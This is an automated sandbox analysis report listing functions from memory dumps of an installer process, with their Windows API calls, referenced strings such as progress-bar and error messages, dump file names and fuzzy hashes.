                                                                                              Function 6395372E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: Enable$false
                                                                                              • API String ID: 431132790-2988405606
                                                                                              • Opcode ID: 367b197eed222f3b18bd7fa01f9eeec8a7296866875fa4fd87a5a7601de170cb
                                                                                              • Instruction ID: c97e0cf14d21b9a9ee457eac6b6ad3c36dd2335080e7a2d6c53bdc6d43bc3f5b
                                                                                              • Opcode Fuzzy Hash: 367b197eed222f3b18bd7fa01f9eeec8a7296866875fa4fd87a5a7601de170cb
                                                                                              • Instruction Fuzzy Hash: 60115EB59002498FDB10DBF8C984BDDB3B86F25B28F140155E120E7281D774DA888F61
                                                                                              Function 6C5E8844 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageTrace
                                                                                              • String ID: <NULL>$NULL
                                                                                              • API String ID: 471583391-888386124
                                                                                              • Opcode ID: 5c41064352c5f880d073186499b825c08559b2b0f5a11edf5b2b19b60d450a29
                                                                                              • Instruction ID: 08ba4742aeedd507eb27845b734466a3290bf55ad3b699054765fd11381d89cd
                                                                                              • Opcode Fuzzy Hash: 5c41064352c5f880d073186499b825c08559b2b0f5a11edf5b2b19b60d450a29
                                                                                              • Instruction Fuzzy Hash: 9201B17264420AAAEB049E48CC16FA73735EB88704F088916FE109A890D7B1D590C786
                                                                                              Function 6C5D198C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SqmCleanup.SQMAPI(?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5D1E1C
                                                                                                • Part of subcall function 6C5D247C: LoadLibraryW.KERNEL32(advapi32,?,6C5D19A1,00000000,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5D2484
                                                                                                • Part of subcall function 6C5D247C: GetProcAddress.KERNEL32(00000000,TraceMessage), ref: 6C5D24A1
                                                                                                • Part of subcall function 6C5D247C: GetProcAddress.KERNEL32(00000000,TraceMessageVa), ref: 6C5D24C0
                                                                                                • Part of subcall function 6C5D247C: FreeLibrary.KERNEL32(00000000,?,6C5D19A1,00000000,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5D24D0
                                                                                                • Part of subcall function 6C5D2671: InitializeCriticalSectionAndSpinCount.KERNEL32(6C5F0168,00000FA0,?,?,6C5D19CB,Microsoft\Windows\SoftwareQualityMetricsClient,6C5F0180,00000000,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5D268E
                                                                                                • Part of subcall function 6C5D2671: SetLastError.KERNEL32(00000000,?,?,6C5D19CB,Microsoft\Windows\SoftwareQualityMetricsClient,6C5F0180,00000000,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5D26D1
                                                                                              • DisableThreadLibraryCalls.KERNEL32(?,Microsoft\Windows\SoftwareQualityMetricsClient,6C5F0180,00000000,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5D19CE
                                                                                              Strings
                                                                                              • Microsoft\Windows\SoftwareQualityMetricsClient, xrefs: 6C5D19AC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressProc$CallsCleanupCountCriticalDisableErrorFreeInitializeLastLoadSectionSpinThread
                                                                                              • String ID: Microsoft\Windows\SoftwareQualityMetricsClient
                                                                                              • API String ID: 1374315629-2483579846
                                                                                              • Opcode ID: 118a9bc7d47e218a0ebe3893bebb9e13b0acd0ba00a328eaf89222228b0aa70f
                                                                                              • Instruction ID: d18072b5c98a1f304aedb48dba081acd8507eb4ab5a67f88c877bffcb047966c
                                                                                              • Opcode Fuzzy Hash: 118a9bc7d47e218a0ebe3893bebb9e13b0acd0ba00a328eaf89222228b0aa70f
                                                                                              • Instruction Fuzzy Hash: BF01C470119384EBCB056B5DDC05F4B3AB4AB82328F474451E5209AD62C730FD959F9D
                                                                                              Function 6C5E88BE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageTrace
                                                                                              • String ID: <NULL>$NULL
                                                                                              • API String ID: 471583391-888386124
                                                                                              • Opcode ID: 2fc86818827fca70fcdd3db17bb12d6b965109cfeb65502c82452622c5700333
                                                                                              • Instruction ID: 071066e8dd20a700b68910b7241e726623097481db07e2bed007466dafdec568
                                                                                              • Opcode Fuzzy Hash: 2fc86818827fca70fcdd3db17bb12d6b965109cfeb65502c82452622c5700333
                                                                                              • Instruction Fuzzy Hash: 7301D17264420EAEEB059E0CCC01FA73B7AEB8D704F54C813FE10AA990D7B0D9918783
                                                                                              Function 6C5E77B8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageTrace
                                                                                              • String ID: <NULL>$NULL
                                                                                              • API String ID: 471583391-888386124
                                                                                              • Opcode ID: fd3e8fd0d49b55e332a8a8cb77a2ce9941999ff142ee603f44f4032693390c37
                                                                                              • Instruction ID: fb0679f479ccd1ed3b2e46d7175b68f9e4396bd74bb05a38dd008741cb08fc09
                                                                                              • Opcode Fuzzy Hash: fd3e8fd0d49b55e332a8a8cb77a2ce9941999ff142ee603f44f4032693390c37
                                                                                              • Instruction Fuzzy Hash: B401F97264020AABEB099F09CC56FA73B7AFB8D744F148415FA108F892D7B0D991C781
                                                                                              Function 6C5E774A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageTrace
                                                                                              • String ID: <NULL>$NULL
                                                                                              • API String ID: 471583391-888386124
                                                                                              • Opcode ID: fb04a0b677af3dd55890dc9ba656f5e52e44d0395cfed14260f9bbc1d98cf188
                                                                                              • Instruction ID: 7171a4ddf7295bd62ca16d99e9b4e027d864d30d3a90835a5bd33a6b94e68702
                                                                                              • Opcode Fuzzy Hash: fb04a0b677af3dd55890dc9ba656f5e52e44d0395cfed14260f9bbc1d98cf188
                                                                                              • Instruction Fuzzy Hash: 4201223664024AEBEB019E4ACC05FA33B76EB8D794F188491FA108E996D7B0D9D1C7C4
                                                                                              Function 63950E35 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 63960324: SendMessageW.USER32(?,00000437,00000000,?), ref: 63960344
                                                                                              • _memset.LIBCMT ref: 63950E62
                                                                                              • SendMessageW.USER32(?,00000444,00000001,00000074), ref: 63950E92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$_memset
                                                                                              • String ID: t
                                                                                              • API String ID: 1515505866-2238339752
                                                                                              • Opcode ID: 80724360a2c089147d1dac81c4bf1d0c5e4731759eb9990e9ad982a80f5d6b55
                                                                                              • Instruction ID: 676c9ff4295b9f5ff2a7db27c0a2be2a53b93d6192448c686e812cfafefc0e0b
                                                                                              • Opcode Fuzzy Hash: 80724360a2c089147d1dac81c4bf1d0c5e4731759eb9990e9ad982a80f5d6b55
                                                                                              • Instruction Fuzzy Hash: 8601287190421CAFEF10DFA8C842ACE7BF4AF0A608F600129F915A7281D775EA148F91
                                                                                              Function 6394CAC2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6394CAC9
                                                                                                • Part of subcall function 6395F143: __EH_prolog3.LIBCMT ref: 6395F14A
                                                                                                • Part of subcall function 6395F0E8: __EH_prolog3.LIBCMT ref: 6395F0EF
                                                                                                • Part of subcall function 6395F092: __EH_prolog3.LIBCMT ref: 6395F099
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: .Parse error:$Invalid XML
                                                                                              • API String ID: 431132790-1700598720
                                                                                              • Opcode ID: 56306809ed2309e6624e375ac65f918c5f2fca9d59fc270e90f3ca9a7c9afcac
                                                                                              • Instruction ID: 76bab32cfb596b77807e4037def8d43842349ca9f73dff8780f0e0ec88fb4390
                                                                                              • Opcode Fuzzy Hash: 56306809ed2309e6624e375ac65f918c5f2fca9d59fc270e90f3ca9a7c9afcac
                                                                                              • Instruction Fuzzy Hash: 42018F32500209AFDB10D7F8C941BEE77B4AF21B2CF144204E124A72C2D774DA998FA1
                                                                                              Function 6C5DBAE2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,80000040,00000000,00000000,6C5DBA57,00000000,?,?,00000000,?,6C5D8733,?,0000000C,6C5DBCB8,6C5D0000), ref: 6C5DBAFB
                                                                                              • GetLastError.KERNEL32(?,?,00000000,?,6C5D8733,?,0000000C,6C5DBCB8,6C5D0000), ref: 6C5E229A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountCriticalErrorInitializeLastSectionSpin
                                                                                              • String ID: j
                                                                                              • API String ID: 439134102-2137352139
                                                                                              • Opcode ID: eefaa42ded2299b58acbe3091b065046be89323a89224316f5113d87d2f59620
                                                                                              • Instruction ID: 80c3de8e3b80c95025ce1a5014d0b1a4ba8754ae672b7416ea3f79befaded1b3
                                                                                              • Opcode Fuzzy Hash: eefaa42ded2299b58acbe3091b065046be89323a89224316f5113d87d2f59620
                                                                                              • Instruction Fuzzy Hash: AAF0F6313413009FD764AF2A8C04F463AFAABC9355B16082AE156D6D55C730E806DF18
                                                                                              Function 63961169 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63961170
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 639611B1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$DirectorySystem
                                                                                              • String ID: C:\
                                                                                              • API String ID: 105093994-3404278061
                                                                                              • Opcode ID: 2e663c20c0bc6a00c3f74c90c86abdaf30ea9bebc06eacebe6a89726e1939120
                                                                                              • Instruction ID: 0c8a23ac5230027d10d6c96c8af80def9104277f1ad36478fda18f1191130fd5
                                                                                              • Opcode Fuzzy Hash: 2e663c20c0bc6a00c3f74c90c86abdaf30ea9bebc06eacebe6a89726e1939120
                                                                                              • Instruction Fuzzy Hash: BC014BB19112198BDF04EBA8CC48AAEB7B5FF26B28F044514F521AB2D0CB30DA45CF90
                                                                                              Function 63959A1E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • IDS_DOWNLOAD_PROGRESS_BAR_HEADER, xrefs: 63959A39
                                                                                              • IDS_FILE_VERIFICATION_PROGRESS_BAR_HEADER, xrefs: 63959A32
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: IDS_DOWNLOAD_PROGRESS_BAR_HEADER$IDS_FILE_VERIFICATION_PROGRESS_BAR_HEADER
                                                                                              • API String ID: 431132790-2780475424
                                                                                              • Opcode ID: f0ca83514a3d26f96997e03c2eb906802621df0450f04e70ff76c9cec760f5bf
                                                                                              • Instruction ID: 1742af8ce5bb4f4f13e8ccfc90cf88c8bb2785abbb9a127ccd4ab7ce10392546
                                                                                              • Opcode Fuzzy Hash: f0ca83514a3d26f96997e03c2eb906802621df0450f04e70ff76c9cec760f5bf
                                                                                              • Instruction Fuzzy Hash: F7F05EB19003058FEF10DBB8C888BAD73B0AF56B18F584988E1509B295D774D5058F50
                                                                                              Function 6394C224 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • An internal or user error was encountered., xrefs: 6394C254, 6394C269
                                                                                              • A StopBlock was hit or a System Requirement was not met., xrefs: 6394C25B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: A StopBlock was hit or a System Requirement was not met.$An internal or user error was encountered.
                                                                                              • API String ID: 431132790-2578323181
                                                                                              • Opcode ID: 881ac014976570648de6632287368deda37d017ea360e93518a8c21a787aece1
                                                                                              • Instruction ID: aef7a75de34f6f0e29c5765171f2d903d4681dd2edc63d791612da0c4f31b698
                                                                                              • Opcode Fuzzy Hash: 881ac014976570648de6632287368deda37d017ea360e93518a8c21a787aece1
                                                                                              • Instruction Fuzzy Hash: 9CE0EDB1606308ABEB00AAF888813AE3274AB62F08F040005E0089F281C3B4CA058FC9
                                                                                              Function 63951F81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63951F88
                                                                                                • Part of subcall function 63951EB5: __EH_prolog3.LIBCMT ref: 63951EBC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: Height$Width
                                                                                              • API String ID: 431132790-1965321196
                                                                                              • Opcode ID: 080fb4d9979be40f4c05e43c15cf17ea6e7740ffb2b2887b0f93d6076a93bf42
                                                                                              • Instruction ID: 91c8deed1a7f3181e2b17f899a94eb55f08ae40aee5b5ef08069ac3c8146c3d8
                                                                                              • Opcode Fuzzy Hash: 080fb4d9979be40f4c05e43c15cf17ea6e7740ffb2b2887b0f93d6076a93bf42
                                                                                              • Instruction Fuzzy Hash: 57F03970F507488BCA349F79801520AF6E2AFE2E18F11C92EE0568F385DF74D9968F81
                                                                                              Function 6395A051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetPropW.USER32(?,RotatingIconDisplayTHIS), ref: 6395A05F
                                                                                                • Part of subcall function 63959CD5: GetTickCount.KERNEL32 ref: 63959CDC
                                                                                              • SendMessageW.USER32(00000000,00000172,00000001,00000000), ref: 6395A07E
                                                                                              Strings
                                                                                              • RotatingIconDisplayTHIS, xrefs: 6395A057
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountMessagePropSendTick
                                                                                              • String ID: RotatingIconDisplayTHIS
                                                                                              • API String ID: 85587915-353257254
                                                                                              • Opcode ID: ae254c610242d8384632ee125476985424307a34f8fbd44ac376c7626b658b14
                                                                                              • Instruction ID: bcd7b2591005da35c958eded025d60354583b539445dfbad0faf629a688495b5
                                                                                              • Opcode Fuzzy Hash: ae254c610242d8384632ee125476985424307a34f8fbd44ac376c7626b658b14
                                                                                              • Instruction Fuzzy Hash: 2EE0C232005758BFCB227B50CC09E867FA5EB43BB0B000020F9599A162C762CC20DE80
                                                                                              Function 63961E15 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63961E1C
                                                                                              • GetCommandLineW.KERNEL32(00000018,6395B187,00000000,?,?,6395AC46,?), ref: 63961E21
                                                                                                • Part of subcall function 6394BE03: __EH_prolog3.LIBCMT ref: 6394BE0A
                                                                                                • Part of subcall function 6394B9A7: __EH_prolog3.LIBCMT ref: 6394B9AE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$CommandLine
                                                                                              • String ID: showfinalerror
                                                                                              • API String ID: 1384747822-3200933950
                                                                                              • Opcode ID: a8c3fd1bde46a544a89c36e873ee1aee42758adcd4c6a245d2718982e0424445
                                                                                              • Instruction ID: c5b1a7f3499f817d23285a7958120e22c1bda0cafbf03f6e35a1a42367054b5c
                                                                                              • Opcode Fuzzy Hash: a8c3fd1bde46a544a89c36e873ee1aee42758adcd4c6a245d2718982e0424445
                                                                                              • Instruction Fuzzy Hash: 7EE0EC75A513086AEE14E7B48915BDD22B09B6AE0DF9040589145BB2C2EF28EA0D9F61
                                                                                              Function 6395A027 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KillTimer.USER32(00000125,00000002), ref: 6395A031
                                                                                              • RemovePropW.USER32(00000125,RotatingIconDisplayTHIS), ref: 6395A03E
                                                                                              Strings
                                                                                              • RotatingIconDisplayTHIS, xrefs: 6395A037
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: KillPropRemoveTimer
                                                                                              • String ID: RotatingIconDisplayTHIS
                                                                                              • API String ID: 3686338637-353257254
                                                                                              • Opcode ID: ff42afd3e8e3aadc71200d05f8f7966453546ee8334b4fb8e85d4b38b715c48b
                                                                                              • Instruction ID: 6b0ce8011d72fd1858128ed1ac49d40d917dced7a4557f415b79fd6096c40ecc
                                                                                              • Opcode Fuzzy Hash: ff42afd3e8e3aadc71200d05f8f7966453546ee8334b4fb8e85d4b38b715c48b
